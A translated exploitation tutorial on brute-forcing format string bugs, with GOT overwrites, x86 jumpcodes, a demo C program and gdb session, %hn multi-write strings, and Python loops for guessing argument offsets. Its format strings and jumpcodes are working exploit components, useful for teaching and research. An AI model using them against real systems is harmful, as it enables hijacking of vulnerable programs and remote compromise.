20CN Network Security Group - Advanced format string exploit techniques, P59-0x07 (part 1)

Original: "Advances in format string exploiting"
by gera <gera@corest.com>, riq <riq@corest.com>
Translated and edited by
alert7 < alert7@xfocus.org >
Homepage: http://www.xfocus.org/ http://www.whitecell.org/
yikaikai < yikaikai@sina.com >

Part 1: Brute forcing format strings
Part 2: Exploiting heap strings (on SPARC)

|=-----------=[ Part 1: Brute forcing format strings ]=------------=|
|=----------------------=[ gera <gera@corest.com> ]=---------------------=|

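1 - Introduction
2 - 32*32 == 32 - Using jumpcodes
2.1 - Writing code to any known address
2.2 - The code is somewhere else
2.3 - No usable address
3 - n times faster
3.1 - Multiple address overwrite
3.2 - Multiple parameter bruteforcing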
4 - more greets and thanks
5 - References

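Preface:

This article was originally being translated by yikaikai of the whitecell
forum ( http://www.whitecell.org/forums/ ). Unfortunately he no longer has
the time, so the translation was handed over to me. Thanks all the same to
yikaikai for his hard work on the first part.

This article is about brute forcing format strings. What it discusses
applies to bugs like the syslog format string bug, that is, cases where the
format string bug gives no feedback. When the bug does give feedback, we can
learn from the returned information and make the exploit smarter. For
details see the article written by pappy@miscmag.com, which I translated as
"How to write a remote, automatic, precisely targeting format string exploit".
This article only presents ideas; the actual implementation is up to you.
The translation was somewhat rushed, so corrections are welcome.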

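--[ 1. Introduction

You may be looking for articles on format string exploits. A good place to
start is scut's excellent paper on format strings.

This article presents two small tricks that speed up bruteforcing when
exploiting format strings.

"...brute forcing is certainly no fun; it is something many exploit authors
hate, and people go out of their way to find other methods to replace it"

Thanks to everyone who provided inspiration on this subject, especially
{MaXX, dvorak, Scrippie}, scut[], lg(zip) and lorian+k.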

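--[ 2. 32*32 == 32 - Using jumpcodes

A format string bug lets you write any data to any location. The author
calls this a write-anything-anywhere primitive. The methods described here
apply whenever you hold such a primitive, whether it comes from a format
string bug, an overwritten destination pointer of strcpy(), an overwritten
argument of free(), or a ret2memcpy buffer overflow (translator's note: I am
not sure what exactly this last one refers to).

Scut[1], shok[2] and others have explained several ways to hook the
execution flow of a program once you hold a write-anything-anywhere
primitive: changing the GOT, changing function pointers, changing atexit
structures, virtual function pointers of classes, and so on. To do this you
must know or predict two different addresses: the address of the function
pointer and the address of the shellcode. Bruteforcing blindly, you would
have to guess 64 bits. In practice it is less than that: the GOT address
always starts with 0x0804 and your code always starts with 0x0805 (this
really does hold for Linux), so it is 32 bits, not 64. That leaves
4,294,967,296 tries. You may be able to supply a cushion of 4K of nops,
which lets you step 4K at a time and brings it down to 1,048,576 tries. And
since each GOT entry is 4 bytes wide, 262,144 remain. Even the smallest of
these numbers, 262,144, is still far too many for a remote target (locally
it may be more bearable).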
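
The arithmetic in the paragraph above can be checked with a few lines of
Python. This is only a sketch of the counting argument; the variable names
are illustrative and not part of the original article.

```python
# Search-space arithmetic from the paragraph above (illustrative only).
blind_bits = 32 + 32            # two unknown 32-bit addresses
known_prefix_bits = 16 + 16     # assume the 0x0804.... and 0x0805.... prefixes

tries = 2 ** (blind_bits - known_prefix_bits)
tries_with_nops = tries // 4096            # a 4K nop cushion allows 4K steps
tries_got_aligned = tries_with_nops // 4   # GOT entries are 4 bytes apart

print(tries, tries_with_nops, tries_got_aligned)
```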

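Sometimes other techniques can help: if we have a read primitive we can read
things out of the target process and learn from them, or we can turn the
write primitive into a read primitive, or use a large run of nops, or use
the target's stack, or simply hardcode the addresses. Use whatever suits you.

You can do more than that, because you are not limited to writing only
4 bytes: you can write your shellcode to any address you choose.

Anyone familiar with format string bugs will have thought of this already:
writing the shellcode to an arbitrary address
(when the target contains code like
    for (;;)
        printf(buf);
)
I have also written a modest article on this, "Bypassing libsafe protection:
the technique of overwriting _dl_lookup_versioned_symbol", which presents a
new technique, overwriting _dl_lookup_versioned_symbol. It adds one more way
of gaining control of a program.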

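To summarize the methods:
1. Overwriting the GOT
2. Using DTORS
3. Using C library hooks
4. Using atexit structures (statically linked binaries only)
5. Overwriting function pointers
6. Overwriting jmpbufs
7. Overwriting _dl_lookup_versioned_symbol

In fact, overwriting _dl_lookup_versioned_symbol is also a GOT overwrite,
only the GOT in question is ld's.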

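----[ 2.1 Writing code to any known address

As long as a format string bug exists, you can write anything to different
places in memory, so you can pick a known writable address, for example
0x8051234. We write the code there and then change a function pointer (GOT,
atexit structure, etc.) to point to it:

    GOT[read]:  0x8051234           ; of course using read is just
                                    ; an example

    0x8051234:  shellcode

Now the address of the shellcode is one we chose, always 0x8051234, so only
the address of the function pointer has to be bruteforced; in the worst case
you will be bruteforcing 15 bits. That is still a large number.

When using this technique through a format string you may not be able to
write a 200-byte shellcode (can you?). Maybe you can only write a 30-byte
shellcode, or maybe only a few bytes. So we need a jumpcode.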

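----[ 2.2 The code is somewhere else

I trust you are able to place some code at some address in the memory of
the target process. If so, what we need is a jumpcode that locates the
shellcode and jumps to it. This is fairly easy and takes only a small trick.

If the shellcode is somewhere on the stack and you know roughly how far it
is from SP when the jumpcode executes, you can jump relative to SP with a
jumpcode of just 8 or 5 bytes:

    GOT[read]:  0x8051234

    0x8051234:  add $0x200, %esp    ; delta from SP to code
                jmp *%esp           ; just use esp if you can

    esp+0x200:  nops...             ; just in case delta is
                                    ; not really constant
                real shellcode      ; this is not written using
                                    ; the format string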
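
As a rough check of the jumpcode sizes, the two instructions can be encoded
by hand. The helper below is a hypothetical illustration, not part of the
original article; it assumes the standard IA-32 encodings (83 /0 ib and
81 /0 id for add, FF /4 for the indirect jmp) and only handles non-negative
deltas.

```python
import struct

def sp_relative_jumpcode(delta):
    """Return x86-32 machine code for: add $delta, %esp ; jmp *%esp."""
    if 0 <= delta <= 0x7f:
        # Short form: 8-bit immediate, sign-extended by the CPU.
        add = b"\x83\xc4" + struct.pack("<b", delta)
    else:
        # Long form: full 32-bit immediate.
        add = b"\x81\xc4" + struct.pack("<I", delta)
    return add + b"\xff\xe4"            # jmp *%esp

for delta in (0x200, 0x40):
    code = sp_relative_jumpcode(delta)
    print(hex(delta), len(code), code.hex())
```

With a delta that fits in 7 bits the jumpcode shrinks from 8 to 5 bytes,
which matches the two sizes quoted in the text.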

What if the shellcode is in the heap? Any good ideas? The following idea
comes from Kato (this version is 18 bytes; Kato's version is a little
longer, and he did not use a format string):

    GOT[read]:  0x8051234

    0x8051234:  cld
                mov $0x4f54414a,%eax    ; so it doesn't find
                inc %eax                ; itself (tx juliano)
                mov $0x804fff0, %edi    ; is it low enough?
                                        ; make it lower
                repne scasl
                jcxz .-2                ; keep searching!
                jmp *%edi               ; upper case letters
                                        ; are ok opcodes.

    somewhere
    in heap:    KATO                    ; if you know the alignment

                KKATO                   ; one is enough, otherwise
                KKATO                   ; make some be found
                KKATO
                real shellcode
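
The following sketch shows why the immediate is stored as 0x4f54414a and
incremented, and why the 'KKATO' copies help when the alignment is unknown.
It is a simulation under stated assumptions: find_egg() is a hypothetical
stand-in for the dword-wise `repne scasl` scan, and the buffer contents are
made up.

```python
import struct

stored = 0x4f54414a                  # immediate embedded in the jumpcode
egg = (stored + 1) & 0xffffffff      # value in %eax after `inc %eax`

def find_egg(memory, start=0, tag=struct.pack("<I", egg)):
    """Scan in 4-byte steps like repne scasl; return the index just past the tag."""
    for off in range(start, len(memory) - 3, 4):
        if memory[off:off + 4] == tag:
            return off + 4           # scasl leaves %edi after the matching dword
    return None

layout = b"KATO" + b"KKATO" * 3 + b"<shellcode>"
for pad in range(4):                 # every possible misalignment of the buffer
    print(pad, find_egg(b"\x00" * pad + layout))
```

The jumpcode itself contains "JATO", not "KATO", so the scan cannot match
its own immediate. Because the tags repeat with a period of 5 bytes, one of
the four copies is dword-aligned whatever the padding is.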

What if it is on the stack but you do not know exactly where? (10 bytes)

    GOT[read]:  0x8051234

    0x8051234:  mov $0x4f54414a,%ebx    ; so it doesn't find
                inc %ebx                ; itself (tx juliano)
                pop %eax                ; pops read's arguments (translator)
                cmp %ebx, %eax
                jnz .-2
                jmp *%esp

    somewhere
    in stack:   KATO                    ; you'll know the alignment
                real shellcode

Somewhere else? OK, then you can build your own jumpcode :-) But be careful:
'KATO' may not be the best string to use, because executing it may have
side effects. :-)

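--| Friendly functions |--

Once you have changed the GOT so that it points to your own code, you can
play some tricks. For example, if you hook free() and the argument of free()
points to the buffer holding the shellcode, all we need is this: (2 bytes)

    GOT[free]:  0x8051234           ; using free this time

    0x8051234:  pop %eax            ; discarding real ret addr
                ret                 ; jump to free's argument

The same goes for read(), syslog() and some other functions. The difference
is that you may need a slightly more complex jumpcode: (7 or 10 bytes)

    GOT[syslog]: 0x8051234          ; using syslog

    0x8051234:  pop %eax            ; discarding real ret addr
                pop %eax
                add $0x50, %eax     ; skip some non-code bytes
                jmp *%eax

If nothing else works but you can tell a crash from a hang, you can use an
infinite loop to hang the target: bruteforce the GOT address until the
server hangs, at which point you know the correct location of the GOT, and
then go on to bruteforce the address of the shellcode.

    GOT[exit]:  0x8051234

    0x8051234:  jmp .               ; infinite loop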
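
The hang/crash trick turns one search over two unknowns into two separate
searches. The simulation below is a minimal sketch of that idea; the probe
functions, address ranges and step sizes are all hypothetical stand-ins for
sending a real payload and observing the server.

```python
def brute_force(candidates, probe, wanted):
    """Try each candidate until probe() reports `wanted`; return (hit, tries)."""
    tries = 0
    for addr in candidates:
        tries += 1
        if probe(addr) == wanted:
            return addr, tries
    return None, tries

# Simulated target; both addresses are made-up values for the demonstration.
REAL_GOT, REAL_CODE = 0x8049094, 0x8051200

def probe_got(guess):
    # Phase 1 payload: point GOT[exit] at "jmp ." so a correct guess hangs.
    return "hang" if guess == REAL_GOT else "crash"

def probe_code(guess):
    # Phase 2 payload: the GOT address is known, only the code address varies.
    return "shell" if guess == REAL_CODE else "crash"

got, t1 = brute_force(range(0x8049000, 0x804a000, 4), probe_got, "hang")
code, t2 = brute_force(range(0x8050000, 0x8060000, 0x100), probe_code, "shell")
print(hex(got), hex(code), t1 + t2)
```

The total cost is the sum of the two searches rather than their product,
which is the whole point of being able to recognize a hang.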

----[ 2.3 No usable address

The author does not like picking arbitrary addresses such as 0x8051234, so
he uses a slightly different approach:

    GOT[free]:  &GOT[free]+4        ; point it to the next 4 bytes
                jumpcode            ; address is GOT[free]+4

You do not know the address of GOT[free], but on each bruteforcing step you
assume that you do, and make it point 4 bytes further on, where the jumpcode
is placed. For example, if you assume GOT[free] is at 0x8049094, your
jumpcode will be at 0x8049098, so you have to write the value 0x8049098 to
address 0x8049094. Then, when free() is called, execution jumps to
0x8049098:

/* fstring.c                                                   *
 * demo program to show format strings techniques              *
 * specially crafted to feed your brain by gera@corest.com     */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main() {
    char buf[1000];

    strcpy(buf,
        "\x88\x96\x04\x08" // GOT[free]'s address (as found on my machine)
        "\x8a\x96\x04\x08" //
        "\x8c\x96\x04\x08" // jumpcode address (2 bytes for the demo)
        "%.38528u"         // complete to 0x968c (0x968c-3*4)
        "%4$hn"            // write 0x968c to 0x8049688
        "%.29048u"         // complete to 0x10804 (0x10804-0x968c)
        "%5$hn"            // write 0x0804 to 0x804968a
        "%.47956u"         // complete to 0x1c358 (0x1c358-0x10804)
        "%6$hn"            // write 0xc358 (pop - ret) to 0x804968c
    );

    printf(buf);
    free(buf);             // added by alert7 so that free() gets a GOT entry
}

[alert7@redhat73 alert7]$ gcc -o fstring fstring.c
[alert7@redhat73 alert7]$ gdb fstring -q
(gdb) br main
Breakpoint 1 at 0x8048479
(gdb) r
Starting program: /home/alert7/fstring
Breakpoint 1, 0x08048479 in main ()
(gdb) disass main
Dump of assembler code for function main:
0x8048470 <main>: push %ebp
0x8048471 <main+1>: mov %esp,%ebp
0x8048473 <main+3>: sub $0x3f8,%esp
0x8048479 <main+9>: sub $0x8,%esp
0x804847c <main+12>: push $0x8048540
0x8048481 <main+17>: lea 0xfffffc08(%ebp),%eax
0x8048487 <main+23>: push %eax
0x8048488 <main+24>: call 0x8048358 <strcpy>
0x804848d <main+29>: add $0x10,%esp
0x8048490 <main+32>: sub $0xc,%esp
0x8048493 <main+35>: lea 0xfffffc08(%ebp),%eax
0x8048499 <main+41>: push %eax
0x804849a <main+42>: call 0x8048338 <printf>
0x804849f <main+47>: add $0x10,%esp
0x80484a2 <main+50>: sub $0xc,%esp
0x80484a5 <main+53>: lea 0xfffffc08(%ebp),%eax
0x80484ab <main+59>: push %eax
0x80484ac <main+60>: call 0x8048348 <free>
0x80484b1 <main+65>: add $0x10,%esp
(gdb) b * 0x80484ac
Breakpoint 2 at 0x80484ac
(gdb) c
...
00000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000
Breakpoint 2, 0x080484ac in main ()
(gdb) x/x 0x8049688
0x8049688 <_GLOBAL_OFFSET_TABLE_+28>: 0x0804968c
(gdb) x/2i 0x0804968c
0x804968c <_GLOBAL_OFFSET_TABLE_+32>: pop %eax
0x804968d <_GLOBAL_OFFSET_TABLE_+33>: ret
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffff720 in ?? ()

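OK, execution has jumped into buf.

The author's original listing had no free(buf); the program therefore never
used free(), and free() would not have appeared in the GOT at all, which is
why the call was added. In this example GOT[free] is at 0x8049688. Using the
format string bug we changed the value of GOT[free] to 0x0804968c, so the
next call to free() transfers control to 0x0804968c.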
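
The paddings in fstring.c follow mechanically from the values to be written.
The helper below is a hedged sketch of that calculation, not the author's
tool: build_hn_format() is a hypothetical name, and it assumes direct
parameter access with the addresses placed at the very start of the string.

```python
import struct

def build_hn_format(writes, first_arg):
    """Build a format string doing one %hn write per (address, value) pair.

    writes    -- list of (address, 16-bit value), in the order to be written
    first_arg -- direct-parameter index of the first address on the stack
    """
    header = b"".join(struct.pack("<I", addr) for addr, _ in writes)
    printed = len(header)                    # characters output so far
    body = b""
    for i, (_, value) in enumerate(writes):
        pad = (value - printed) % 0x10000    # %hn keeps only the low 16 bits
        if pad < 10:
            pad += 0x10000                   # "%.Nu" may print up to 10 digits anyway
        body += b"%%.%du%%%d$hn" % (pad, first_arg + i)
        printed += pad
    return header + body

demo = build_hn_format(
    [(0x8049688, 0x968c), (0x804968a, 0x0804), (0x804968c, 0xc358)],
    first_arg=4,
)
print(demo[12:].decode())
```

Called with the three writes of the demo program, this reproduces the
paddings 38528, 29048 and 47956 used in fstring.c.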

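This last method has another advantage: it is usable not only with format
strings, where each write can go to a different address, but with any
write-anything-anywhere primitive, such as an overwritten destination
pointer of strcpy() or a ret2memcpy buffer overflow. If you are clever and
lucky enough, you may even apply it to a single free() bug (a free(buf)
where the chunk of buf is controlled by the user).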

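--[ 3. n times faster

----[ 3.1 - Multiple address overwrite

If you can write more than 4 bytes, you can not only put the shellcode or
jumpcode wherever you want, you can also change several pointers at the same
time, speeding up the bruteforce again.

This of course still requires a write-anything-anywhere primitive that lets
us write more than 4 bytes at once. Here is a simple way to write the same
value to all the pointers using format strings.

Suppose we use the following format string to write 0x12345678 to address
0x08049094: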

"\x94\x90\x04\x08" // the address to write the first 2 bytes
"AAAA" // space for 2nd %.u
"\x96\x90\x04\x08" // the address for the next 2 bytes
"%08x%08x%08x%08x%08x%08x" // pop 6 arguments
"%.22076u" // complete to 0x5678 (0x5678-4-4-4-6*8)
"%hn" // write 0x5678 to 0x8049094
"%.48060u" // complete to 0x11234 (0x11234-0x5678)
"%hn" // write 0x1234 to 0x8049096

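Because %hn adds no characters to the output string, we can write the same
value to several different locations without any extra padding. For example,
the following format string writes the value 0x12345678 to five consecutive
4-byte locations starting at address 0x8049094: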

"\x94\x90\x04\x08" // addresses where to write 0x5678
"\x98\x90\x04\x08" //
"\x9c\x90\x04\x08" //
"\xa0\x90\x04\x08" //
"\xa4\x90\x04\x08" //
"AAAA" // space for 2nd %.u
"\x96\x90\x04\x08" // addresses for 0x1234
"\x9a\x90\x04\x08" //
"\x9e\x90\x04\x08" //
"\xa2\x90\x04\x08" //
"\xa6\x90\x04\x08" //
"%08x%08x%08x%08x%08x%08x" // pop 6 arguments
"%.22044u" // complete to 0x5678: 0x5678-(5+1+5)*4-6*8
"%hn" // write 0x5678 to 0x8049094
"%hn" // write 0x5678 to 0x8049098
"%hn" // write 0x5678 to 0x804909c
"%hn" // write 0x5678 to 0x80490a0
"%hn" // write 0x5678 to 0x80490a4
"%.48060u" // complete to 0x11234 (0x11234-0x5678)
"%hn" // write 0x1234 to 0x8049096
"%hn" // write 0x1234 to 0x804909a
"%hn" // write 0x1234 to 0x804909e
"%hn" // write 0x1234 to 0x80490a2
"%hn" // write 0x1234 to 0x80490a6

Or the equivalent, using direct parameter access ($):

"\x94\x90\x04\x08" // addresses where to write 0x5678
"\x98\x90\x04\x08" //
"\x9c\x90\x04\x08" //
"\xa0\x90\x04\x08" //
"\xa4\x90\x04\x08" //
"\x96\x90\x04\x08" // addresses for 0x1234
"\x9a\x90\x04\x08" //
"\x9e\x90\x04\x08" //
"\xa2\x90\x04\x08" //
"\xa6\x90\x04\x08" //
"%.22096u" // complete to 0x5678 (0x5678-5*4-5*4)
"%8$hn" // write 0x5678 to 0x8049094
"%9$hn" // write 0x5678 to 0x8049098
"%10$hn" // write 0x5678 to 0x804909c
"%11$hn" // write 0x5678 to 0x80490a0
"%12$hn" // write 0x5678 to 0x80490a4
"%.48060u" // complete to 0x11234 (0x11234-0x5678)
"%13$hn" // write 0x1234 to 0x8049096
"%14$hn" // write 0x1234 to 0x804909a
"%15$hn" // write 0x1234 to 0x804909e
"%16$hn" // write 0x1234 to 0x80490a2
"%17$hn" // write 0x1234 to 0x80490a6

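In this example five "function pointers" are overwritten at once, and of
course more can be overwritten. The real limit is how long a string you can
supply. If you are not using direct parameter access (that is, not using
$hn), you also have to consider how many arguments must be popped to reach
the addresses you want to write. Direct parameter access usually has a limit
of its own (30 for Solaris's library, 400 for some Linuxes, possibly other
values elsewhere).

If you want to combine jumpcodes with the multiple address overwrite,
remember that the jumpcode will not sit 4 bytes after the function pointer
but further away, depending on how many addresses you overwrite at once.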
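
The direct-parameter listing in this section can be generated for any number
of slots. The function below is only a sketch under the same layout
assumptions as that listing (all low-half addresses first, then all
high-half addresses, string starting at argument first_arg);
build_multi_write() is a hypothetical name.

```python
import struct

def build_multi_write(base, count, value, first_arg):
    """Write the 32-bit `value` to `count` consecutive 4-byte slots from `base`."""
    lo, hi = value & 0xffff, (value >> 16) & 0xffff
    lo_addrs = [base + 4 * i for i in range(count)]
    hi_addrs = [addr + 2 for addr in lo_addrs]
    header = b"".join(struct.pack("<I", a) for a in lo_addrs + hi_addrs)

    def pad_for(target, printed):
        pad = (target - printed) % 0x10000   # %hn keeps only the low 16 bits
        return pad if pad >= 10 else pad + 0x10000

    pad_lo = pad_for(lo, len(header))
    pad_hi = pad_for(hi, len(header) + pad_lo)
    # One padding, then one %hn per slot: %hn itself prints nothing.
    fmt = b"%%.%du" % pad_lo
    fmt += b"".join(b"%%%d$hn" % (first_arg + i) for i in range(count))
    fmt += b"%%.%du" % pad_hi
    fmt += b"".join(b"%%%d$hn" % (first_arg + count + i) for i in range(count))
    return header + fmt

multi = build_multi_write(0x8049094, 5, 0x12345678, first_arg=8)
print(multi[40:].decode())
```

For five slots this yields the paddings 22096 and 48060 and the parameter
numbers 8 to 17, as in the listing above.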

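----[ 3.2 - Multiple parameter bruteforcing

Sometimes you do not know how many arguments you need to pop, or, when using
$hn, which argument number to reference directly, so you have to keep trying
until you hit the right value. Sometimes this can be done more
intelligently, especially when the format string bug is not blind. In any
case, you may run into situations where the number of arguments to pop is
unknown, and it can be found as in the following example.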

    pops = 8
    worked = 0
    while not worked:
        fstring  = "\x94\x90\x04\x08"       # GOT[free]'s address
        fstring += "\x96\x90\x04\x08"       #
        fstring += "\x98\x90\x04\x08"       # jumpcode address
        fstring += "%.37004u"               # complete to 0x9098
        fstring += "%%%d$hn" % pops         # write 0x9098 to 0x8049094
        fstring += "%.30572u"               # complete to 0x10804
        fstring += "%%%d$hn" % (pops+1)     # write 0x0804 to 0x8049096
        fstring += "%.47956u"               # complete to 0x1c358
        fstring += "%%%d$hn" % (pops+2)     # write (pop - ret) to 0x8049098
        worked = try_with(fstring)          # try_with() sends it; left to you
        pops += 1

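In this example we find the right value by incrementing the variable 'pops'
(using direct parameter access). If the target addresses are repeated
several times, pops can grow faster. For example, we can repeat each address
5 times, which speeds up the bruteforce.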

    pops = 8
    worked = 0
    while not worked:
        fstring  = "\x94\x90\x04\x08" * 5   # GOT[free]'s address
        fstring += "\x96\x90\x04\x08" * 5   # repeat address 5 times
        fstring += "\x98\x90\x04\x08" * 5   # jumpcode address
        fstring += "%.36956u"               # complete to 0x9098 (0x9098-15*4)
        fstring += "%%%d$hn" % pops         # write 0x9098 to 0x8049094
        fstring += "%.30572u"               # complete to 0x10804
        fstring += "%%%d$hn" % (pops+5)     # write 0x0804 to 0x8049096
        fstring += "%.47956u"               # complete to 0x1c358
        fstring += "%%%d$hn" % (pops+10)    # write (pop - ret) to 0x8049098
        worked = try_with(fstring)          # try_with() sends it; left to you
        pops += 5

Hitting any one of the 5 copies is enough; the more copies, the faster it
goes.
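
The gain from repeating addresses can be estimated with a small simulation.
This is a sketch under stated assumptions: tries_needed() is a hypothetical
helper, the true argument index of 100 is made up, and the second and third
addresses are assumed to be referenced exactly one and two block lengths
after the first.

```python
def tries_needed(true_index, copies, start=8):
    """Count attempts until `pops` lands on any copy of the first address.

    true_index -- argument index of the first copy (unknown to the attacker)
    copies     -- how many times each address is repeated in the format string
    """
    if true_index + copies <= start:
        raise ValueError("the search starts beyond the address block")
    pops, tries = start, 1
    while not (true_index <= pops < true_index + copies):
        pops += copies              # a whole block can be skipped per attempt
        tries += 1
    return tries

for copies in (1, 5, 10):
    print(copies, tries_needed(100, copies))
```

The number of attempts drops roughly in proportion to the number of copies,
at the cost of a longer format string.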

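This is a simple idea: just repeat the addresses. If anything is unclear,
work it out with pen and paper: first draw the stack holding the format
string, put some random number of arguments on top of it, and then start
bruteforcing by hand...

It may look silly, but it might help you some day, you never know. Of
course, the same can be done without direct parameter access, but it is more
complicated because the length of the %.u has to be recalculated every time.

--[ unnamed and unlisted section

Throughout this article my point has been that a format string gives you
more than a 4-bytes-write-anything-anywhere primitive: it can write any
number of bytes to any address (a full write-anything-anywhere primitive),
which opens up more possibilities.

That is where the article ends; the rest is up to you.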

--[ 4. more greets and thanks

riq, for trying every stupid idea I have and making it real!

juliano, for being our format strings guru.

Impact, for forcing me to spend time thinking about all these amazing
things.

--[ 5. references

[1] Exploiting Format String Vulnerability, scut's.
March 2001. http://www.team-teso.net/articles/formatstring

[2] w00w00 on Heap Overflows, Matt Conover (shok) and w00w00 Security Team.
January 1999. http://www.w00w00.org/articles.html

[3] Juliano's badc0ded
http://community.corest.com/~juliano

[4] Google the oracle.
http://www.google.com